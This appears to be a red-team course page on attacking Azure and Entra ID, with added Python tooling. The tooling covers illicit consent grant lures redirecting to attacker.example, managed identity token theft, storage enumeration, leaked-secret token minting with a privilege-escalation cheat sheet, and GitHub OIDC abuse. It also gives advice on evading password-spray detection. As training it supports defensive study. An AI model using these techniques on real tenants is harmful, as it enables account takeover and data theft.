Topics
Last updated
Understand opsec fails when using attacks like password spraying in the cloud
Learn about MS Graph API permissions. Understand the differences between the low impact permissions and high impact ones.
Execute Illicit Consent Grant attack for initial access against multiple user simulations in the lab. Go from a simple access token to workstation compromise and further.
Abuse internet facing web applications to get a foothold. Use Managed Identity assigned to the web applications for further access.
Abuse insecure storage accounts.
Execute phishing attacks against a user simulation to get their clear-text credentials.
Use application credentials to access the target tenant.
Abuse CI/CD to get access to an Azure tenant by compromising a GitHub account.
When password spraying or running similar authentication attacks against a cloud tenant, operators have to be mindful of operational security (OpSec). Entra ID records every attempt in the sign-in logs together with the failure reason, Smart Lockout starts throttling an account after repeated failures (10 by default), and Identity Protection raises a dedicated password-spray risk detection when it sees the pattern across many accounts. To stay under those thresholds, attackers spread attempts low and slow over a long period, keep the per-account count well below the lockout limit, and rotate source IP addresses so that no single origin stands out.
Microsoft Graph API permissions span a wide range of impact. Delegated permissions such as openid, profile, email, offline_access and User.Read only expose the signed-in user's own profile and are treated as low impact, so depending on the tenant's user consent settings an ordinary user can grant them to an application on their own. Permissions such as Mail.ReadWrite, Files.ReadWrite.All or Directory.ReadWrite.All are high impact: they reach other users' data or the directory itself and normally require admin consent. Knowing which permissions a user can grant unaided, and which ones trigger an admin consent request or an alert, is what decides whether an attempt to escalate or to reach sensitive data stays quiet.
An illicit consent grant attack tricks a user (or an administrator) into consenting to an attacker-controlled, typically multi-tenant, application registration. The consent prompt is a genuine Microsoft page, so no password is phished and MFA is never challenged; once the user accepts, the attacker redeems the returned authorization code for an access token and a refresh token and calls Graph with whatever permissions were granted. With low-impact permissions that means the victim's profile, with mailbox or file permissions it means their data, and if an administrator consents to high-impact permissions it can escalate to full tenant compromise. In the lab that token is the starting point for the path to workstation compromise and beyond.
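As an added example (not part of the original course material), the following Python sketches the illicit consent grant flow described above and ties it to the permission impact levels from the previous section: it classifies the Graph scopes the attacker intends to request, builds the consent URL for an attacker-registered multi-tenant app, validates the redirect callback, prepares the authorization-code exchange, and finally reads the scp claim of the returned access token to see which permissions the user actually granted. The client ID, redirect URI, tenant and the sample token are constructed placeholders, and the impact classification is a local table, not something Graph returns.

```python
import base64
import json
from urllib.parse import parse_qs, urlencode, urlparse

GRAPH = "https://graph.microsoft.com"
AUTHORITY = "https://login.microsoftonline.com"

# Constructed local classification (not something Graph returns). The low-impact set is
# the one Microsoft suggests for the "selected permissions" user-consent policy; the
# high-impact set reaches other users' data or the directory and normally needs admin consent.
LOW_IMPACT = {"openid", "profile", "email", "offline_access", "User.Read"}
HIGH_IMPACT = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "Files.Read.All", "Files.ReadWrite.All",
    "Directory.Read.All", "Directory.ReadWrite.All", "Application.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}


def short_name(scope):
    """'https://graph.microsoft.com/Mail.Read' and 'Mail.Read' name the same permission."""
    return scope.rsplit("/", 1)[-1]


def classify(scopes):
    """Bucket the scopes we intend to request so we know what will trigger admin consent."""
    out = {"low": [], "high": [], "unknown": []}
    for scope in scopes:
        name = short_name(scope)
        bucket = "low" if name in LOW_IMPACT else "high" if name in HIGH_IMPACT else "unknown"
        out[bucket].append(name)
    return out


def build_consent_url(client_id, redirect_uri, scopes, state, tenant="common"):
    """Authorize URL the victim is lured to; the 'common' endpoint serves a multi-tenant app."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state,
        "prompt": "consent",  # always show the consent screen, even for a previously seen app
    }
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/authorize?{urlencode(params)}"


def parse_callback(callback_url, expected_state):
    """Pull the authorization code out of the redirect, refusing codes from other flows."""
    query = parse_qs(urlparse(callback_url).query)
    if query.get("state", [None])[0] != expected_state:
        raise ValueError("state mismatch: callback does not belong to this flow")
    if "error" in query:  # the user declined, or a consent policy blocked the grant
        return {"error": query["error"][0], "description": query.get("error_description", [""])[0]}
    return {"code": query["code"][0]}


def build_token_request(client_id, client_secret, code, redirect_uri, scopes, tenant="common"):
    """URL and form body for redeeming the code; the reply carries access_token and refresh_token."""
    body = {
        "client_id": client_id,
        "client_secret": client_secret,
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "scope": " ".join(scopes),
    }
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/token", body


def jwt_claims(token):
    """Read a JWT payload without verifying it; fine for inspecting a token issued to us."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def granted_vs_requested(access_token, requested):
    """Compare the scp claim with what was asked for; the user or a policy may have trimmed it."""
    granted = set(jwt_claims(access_token).get("scp", "").split())
    wanted = {short_name(s) for s in requested}
    return {"granted": sorted(granted & wanted), "missing": sorted(wanted - granted)}


def _fake_token(claims):
    """Constructed, unsigned token shaped like a Graph access token (offline use only)."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).decode().rstrip("=")
    return enc({"alg": "none"}) + "." + enc(claims) + "."


# Constructed sample values
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
REDIRECT_URI = "https://attacker.example/callback"
REQUESTED = ["User.Read", "Mail.Read", "Files.ReadWrite.All"]
SAMPLE_TOKEN = _fake_token({"aud": GRAPH, "upn": "victim@contoso.example",
                            "scp": "User.Read Mail.Read"})

if __name__ == "__main__":
    state = "constructed-state-value"
    print(classify(REQUESTED))
    print(build_consent_url(CLIENT_ID, REDIRECT_URI, REQUESTED, state))
    cb = parse_callback(f"{REDIRECT_URI}?code=constructed-code&state={state}", state)
    print(build_token_request(CLIENT_ID, "constructed-secret", cb["code"], REDIRECT_URI, REQUESTED))
    print(granted_vs_requested(SAMPLE_TOKEN, REQUESTED))
```

The classification step is the OpSec decision point: a request that stays inside the low-impact set goes through on the user's own consent, while any high-impact scope turns the lure into an admin consent request that is far more likely to be reviewed.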
Internet-facing web applications are a common foothold. An App Service or Function with a system- or user-assigned managed identity requests tokens from a local identity endpoint without any stored credential, so code execution or SSRF in the application lets an attacker request those same tokens and act as the application's identity against Azure Resource Manager, Key Vault or Graph. The blast radius is whatever roles that identity has been granted, which is frequently far more than the application itself needs, and that is how the foothold turns into privilege escalation inside the cloud environment.
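To make the managed identity abuse concrete, here is an added Python example (not from the course) of what an attacker with code execution in an App Service would do: read the IDENTITY_ENDPOINT and IDENTITY_HEADER variables that App Service injects into the process environment, request a token for Azure Resource Manager (falling back to the VM metadata endpoint when those variables are absent), and use the token to enumerate subscriptions. The environment, token response and subscription listing below are constructed samples so the logic runs offline; fetch_token itself only succeeds on the Azure host that owns the identity.

```python
import json
import os
import urllib.request
from urllib.parse import urlencode

ARM = "https://management.azure.com/"
IMDS = "http://169.254.169.254/metadata/identity/oauth2/token"


def managed_identity_request(resource, env=None):
    """Return (url, headers) for a managed identity token request.

    App Service and Functions inject IDENTITY_ENDPOINT and IDENTITY_HEADER into the
    app's environment; on a VM the token comes from IMDS with the Metadata header.
    No credential is involved either way, which is what makes code execution or
    SSRF inside the application so valuable.
    """
    env = os.environ if env is None else env
    endpoint = env.get("IDENTITY_ENDPOINT")
    if endpoint:
        query = urlencode({"resource": resource, "api-version": "2019-08-01"})
        return f"{endpoint}?{query}", {"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]}
    query = urlencode({"api-version": "2018-02-01", "resource": resource})
    return f"{IMDS}?{query}", {"Metadata": "true"}


def parse_token_response(body):
    """Both endpoints answer with JSON carrying access_token plus resource and expiry fields."""
    data = json.loads(body)
    return {"token": data["access_token"], "resource": data.get("resource"),
            "expires_on": data.get("expires_on"), "client_id": data.get("client_id")}


def fetch_token(resource=ARM, env=None):
    """Live request; only works when executed on the Azure host that owns the identity."""
    url, headers = managed_identity_request(resource, env)
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return parse_token_response(resp.read().decode())


def subscriptions_request(token):
    """First thing to try with an ARM token: which subscriptions can this identity see?"""
    return (f"{ARM}subscriptions?api-version=2020-01-01",
            {"Authorization": f"Bearer {token}"})


def parse_subscriptions(body):
    """Flatten the ARM listing to (id, name, state). An empty list means no
    subscription-scoped role, but the identity may still hold resource-scoped ones."""
    return [(s["subscriptionId"], s["displayName"], s["state"])
            for s in json.loads(body).get("value", [])]


# Constructed samples standing in for the real App Service environment and responses
SAMPLE_ENV = {"IDENTITY_ENDPOINT": "http://127.0.0.1:41221/msi/token",
              "IDENTITY_HEADER": "constructed-header-value"}
SAMPLE_TOKEN_RESPONSE = json.dumps({
    "access_token": "eyJconstructed", "expires_on": "1893456000", "resource": ARM,
    "token_type": "Bearer", "client_id": "11111111-2222-3333-4444-555555555555",
})
SAMPLE_SUBSCRIPTIONS = json.dumps({"value": [
    {"id": "/subscriptions/aaaa", "subscriptionId": "aaaa", "displayName": "prod", "state": "Enabled"},
    {"id": "/subscriptions/bbbb", "subscriptionId": "bbbb", "displayName": "dev", "state": "Disabled"},
]})

if __name__ == "__main__":
    url, headers = managed_identity_request(ARM, SAMPLE_ENV)
    print(url, headers)
    tok = parse_token_response(SAMPLE_TOKEN_RESPONSE)
    print(subscriptions_request(tok["token"]))
    print(parse_subscriptions(SAMPLE_SUBSCRIPTIONS))
```

Swapping the resource for https://vault.azure.net or https://graph.microsoft.com yields tokens for Key Vault or Graph from the same endpoint, which is why the identity's role assignments, not the application's own needs, define what this foothold is worth.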
Storage accounts that allow anonymous (public) access to blobs or containers expose their contents to anyone who finds or guesses the URL, and a SAS token or account key leaked in code, a pipeline or a web page has the same effect. The exposed content is rarely just data: backups, configuration files and deployment scripts frequently contain further credentials, which is why such accounts serve as entry points for the next stage as well as a source of data loss, and why they need to be secured properly.
Phishing remains one of the most effective ways of gaining initial access. A user deceived into entering their credentials on an attacker-controlled page hands over clear-text credentials that can be replayed against any service where MFA or Conditional Access is not enforced for that user, bypassing controls that assume only the legitimate user can authenticate.
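An added example (not from the course) for checking whether a storage container is anonymously listable and for judging how dangerous a leaked SAS token is: it builds the anonymous listing URL, parses the XML listing Azure returns, flags blob names that typically contain further credentials, and decodes the sp/se/sr/sip parameters of a SAS URL. The account name, the XML listing and the SAS URL are constructed samples.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# Blob names that, in practice, tend to hold further credentials or configuration
INTERESTING_SUFFIXES = (".bak", ".env", ".pfx", ".pem", ".config", ".json", ".ps1", ".sh", ".sql", ".zip")


def listing_url(account, container):
    """Anonymous container listing; only the 'Container' public access level answers it."""
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def parse_blob_listing(xml_text):
    """Turn the EnumerationResults XML into a list of dicts (name, size, last modified)."""
    root = ET.fromstring(xml_text)
    return [{"name": b.findtext("Name"),
             "size": int(b.findtext("Properties/Content-Length") or 0),
             "modified": b.findtext("Properties/Last-Modified")}
            for b in root.iter("Blob")]


def anonymous_listing_allowed(status, body):
    """A 200 with an EnumerationResults body is the only positive signal. The error for
    private or blob-level-only containers varies, so treat anything else as 'no'; a
    blob-level-only container still serves individual blobs whose names you already know."""
    return status == 200 and "<EnumerationResults" in body


def interesting_blobs(blobs):
    return [b["name"] for b in blobs if b["name"].lower().endswith(INTERESTING_SUFFIXES)]


def assess_sas(sas_url):
    """Decode the parts of a SAS token that decide how bad a leak is."""
    q = parse_qs(urlparse(sas_url).query)
    first = lambda k: q.get(k, [""])[0]
    perms = first("sp")
    expiry = first("se")
    expires = datetime.fromisoformat(expiry.replace("Z", "+00:00")) if expiry else None
    return {
        "permissions": perms,
        "resource": first("sr") or first("srt"),      # sr: service SAS, srt: account SAS
        "expires": expires,
        "expired": bool(expires) and expires < datetime.now(timezone.utc),
        "writable": any(c in perms for c in "acwd"),  # add / create / write / delete
        "listable": "l" in perms,
        "ip_restricted": bool(first("sip")),
    }


# Constructed samples: what a listable 'backups' container and a leaked SAS URL look like
SAMPLE_LISTING = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://constructedacct.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>db-2024-01.bak</Name><Properties><Last-Modified>Mon, 01 Jan 2024 00:00:00 GMT</Last-Modified><Content-Length>1048576</Content-Length></Properties></Blob>
    <Blob><Name>appsettings.json</Name><Properties><Last-Modified>Mon, 01 Jan 2024 00:00:00 GMT</Last-Modified><Content-Length>812</Content-Length></Properties></Blob>
    <Blob><Name>logo.png</Name><Properties><Last-Modified>Mon, 01 Jan 2024 00:00:00 GMT</Last-Modified><Content-Length>4096</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""
SAMPLE_SAS = ("https://constructedacct.blob.core.windows.net/backups?sp=racwdl"
              "&st=2024-01-01T00:00:00Z&se=2030-01-01T00:00:00Z&sr=c&sv=2022-11-02&sig=constructed%2Bsig")

if __name__ == "__main__":
    print(listing_url("constructedacct", "backups"))
    blobs = parse_blob_listing(SAMPLE_LISTING)
    print(anonymous_listing_allowed(200, SAMPLE_LISTING), interesting_blobs(blobs))
    print(assess_sas(SAMPLE_SAS))
```

A SAS with "w" or "d" in sp and a far-off se is worse than a leaked read-only one: it lets an attacker plant or replace artifacts that other systems later pull and execute, which is the storage-account variant of a supply-chain attack.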
Application credentials (client secrets and certificates on app registrations and their service principals) are a goldmine if they leak, because the client credentials flow is non-interactive: there is no user, so MFA and user-targeted Conditional Access policies never apply, and the resulting token carries whatever application permissions and Azure roles the service principal holds. A secret found in a repository, a pipeline variable or an App Service setting is therefore often enough to access the target tenant directly.
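Added example, not from the course: build the client credentials request that turns a leaked client secret into a Graph token, and inspect the resulting token's claims to see why it sidesteps MFA. App-only tokens carry roles (application permissions) and no user identity, whereas a delegated token carries scp and the signed-in user; the roles then tell the operator which Graph calls to try first. The tenant, client ID, secret and both sample tokens are constructed, and the next-step table is a local cheat sheet, not an API.

```python
import base64
import json
from urllib.parse import urlencode

AUTHORITY = "https://login.microsoftonline.com"
GRAPH_DEFAULT = "https://graph.microsoft.com/.default"


def client_credentials_request(tenant, client_id, client_secret, scope=GRAPH_DEFAULT):
    """URL, headers and form body for the client credentials grant. No user takes part,
    so MFA and user-targeted Conditional Access never enter the picture."""
    body = urlencode({"client_id": client_id, "client_secret": client_secret,
                      "grant_type": "client_credentials", "scope": scope})
    return (f"{AUTHORITY}/{tenant}/oauth2/v2.0/token",
            {"Content-Type": "application/x-www-form-urlencoded"}, body)


def jwt_claims(token):
    """Read a JWT payload without verifying it; we only want to see what we were issued."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def describe_token(token):
    """App-only tokens carry 'roles' and no user identifiers; delegated tokens carry 'scp'
    and the signed-in user. That difference decides which Graph calls will work."""
    c = jwt_claims(token)
    user = c.get("upn") or c.get("preferred_username")
    return {
        "app_only": "scp" not in c and user is None,
        "app_id": c.get("appid") or c.get("azp"),
        "user": user,
        "roles": sorted(c.get("roles", [])),
        "scopes": sorted(c.get("scp", "").split()),
    }


# Local cheat sheet: Graph calls worth trying first, keyed by the application permission
NEXT_STEPS = {
    "Directory.Read.All": "GET /v1.0/users, /v1.0/groups, /v1.0/servicePrincipals",
    "User.Read.All": "GET /v1.0/users",
    "Mail.Read": "GET /v1.0/users/{id}/messages for any mailbox",
    "Directory.ReadWrite.All": "POST /v1.0/users, add members to groups",
    "RoleManagement.ReadWrite.Directory": "assign Global Administrator to a controlled principal",
}


def next_steps(roles):
    return {r: NEXT_STEPS[r] for r in roles if r in NEXT_STEPS}


def _fake_token(claims):
    """Constructed, unsigned token shaped like a Graph access token (offline use only)."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).decode().rstrip("=")
    return enc({"alg": "none"}) + "." + enc(claims) + "."


# Constructed samples: one app-only token from a leaked secret, one delegated token for contrast
APP_TOKEN = _fake_token({"aud": "https://graph.microsoft.com",
                         "appid": "22222222-3333-4444-5555-666666666666",
                         "roles": ["Directory.Read.All", "Mail.Read"]})
DELEGATED_TOKEN = _fake_token({"aud": "https://graph.microsoft.com",
                               "appid": "22222222-3333-4444-5555-666666666666",
                               "upn": "user@contoso.example", "scp": "User.Read Mail.Read"})

if __name__ == "__main__":
    print(client_credentials_request("contoso.onmicrosoft.com",
                                     "22222222-3333-4444-5555-666666666666", "constructed-secret"))
    app = describe_token(APP_TOKEN)
    print(app)
    print(next_steps(app["roles"]))
    print(describe_token(DELEGATED_TOKEN))
```

The same request with a certificate instead of a secret differs only in replacing client_secret with a signed client_assertion; the lack of a user, and therefore of MFA, is identical.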
CI/CD pipelines are another route into a tenant. A developer's GitHub account, or a third-party application authorized against the organization, typically has write access to repositories whose workflows authenticate to Azure, either through secrets stored in the repository or through federated (OIDC) credentials bound to a particular branch, tag or environment. Whoever can edit and run such a workflow can exfiltrate those secrets, mint tokens for the workflow's service principal, or inject code into what the pipeline deploys, and from there reach the subscription or tenant.
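Added example (not from the course) for assessing the CI/CD path into a tenant via GitHub: it reproduces the sub claim GitHub places in an Actions OIDC token, matches it against an Entra federated identity credential the way the token exchange does (issuer, subject, audience), and states what repository access an attacker with a compromised GitHub account needs to obtain a token for that service principal. The repository name, branches and federated credential are constructed; the subject formats are the ones GitHub documents.

```python
GITHUB_ISSUER = "https://token.actions.githubusercontent.com"
DEFAULT_AUDIENCE = "api://AzureADTokenExchange"


def github_subject(repo, event="push", ref=None, environment=None):
    """The 'sub' claim GitHub puts in an Actions OIDC token, per its documented formats.
    A job bound to an environment gets the environment form regardless of the trigger."""
    if environment:
        return f"repo:{repo}:environment:{environment}"
    if event == "pull_request":
        return f"repo:{repo}:pull_request"
    if not ref:
        raise ValueError("push-style events need a ref such as refs/heads/main")
    return f"repo:{repo}:ref:{ref}"


def federated_credential_matches(fic, issuer, subject, audience=DEFAULT_AUDIENCE):
    """Entra's exchange rule: issuer and subject must match exactly, audience must be listed."""
    return (fic["issuer"] == issuer
            and fic["subject"] == subject
            and audience in fic["audiences"])


def minting_contexts(fic, repo, contexts):
    """Which of the given workflow contexts would Entra accept for this credential."""
    hits = []
    for ctx in contexts:
        sub = github_subject(repo, ctx.get("event", "push"), ctx.get("ref"), ctx.get("environment"))
        if federated_credential_matches(fic, GITHUB_ISSUER, sub):
            hits.append(ctx)
    return hits


def required_access(fic):
    """What a compromised GitHub account needs in order to mint a token for this principal."""
    _, repo, kind, *rest = fic["subject"].split(":", 3)
    target = rest[0] if rest else ""
    if kind == "environment":
        return (f"ability to run a job targeting environment '{target}' in {repo} "
                "(subject to its protection rules)")
    if kind == "pull_request":
        return f"ability to open a pull request in {repo} whose workflow runs with id-token: write"
    if target.startswith("refs/heads/"):
        branch = target[len("refs/heads/"):]
        return f"push access to branch '{branch}' of {repo} (or to its workflow files)"
    if target.startswith("refs/tags/"):
        return f"ability to create tag '{target[len('refs/tags/'):]}' in {repo}"
    return f"a workflow run in {repo} with ref {target}"


# Constructed samples: a federated credential bound to main, and a few workflow contexts
SAMPLE_FIC = {"name": "github-main", "issuer": GITHUB_ISSUER,
              "subject": "repo:contoso/infra:ref:refs/heads/main",
              "audiences": [DEFAULT_AUDIENCE]}
SAMPLE_CONTEXTS = [
    {"event": "push", "ref": "refs/heads/main"},
    {"event": "push", "ref": "refs/heads/feature/x"},
    {"event": "pull_request"},
    {"event": "push", "ref": "refs/heads/main", "environment": "prod"},
]

if __name__ == "__main__":
    print(minting_contexts(SAMPLE_FIC, "contoso/infra", SAMPLE_CONTEXTS))
    print(required_access(SAMPLE_FIC))
```

Note the fourth context: a job on main that references an environment presents an environment subject, so it does not match a credential bound to the branch. The flip side is that a credential bound to refs/heads/main is only as safe as the branch protection on main; anyone who can push there, or rewrite the workflow file, gets the service principal's token without ever seeing a secret.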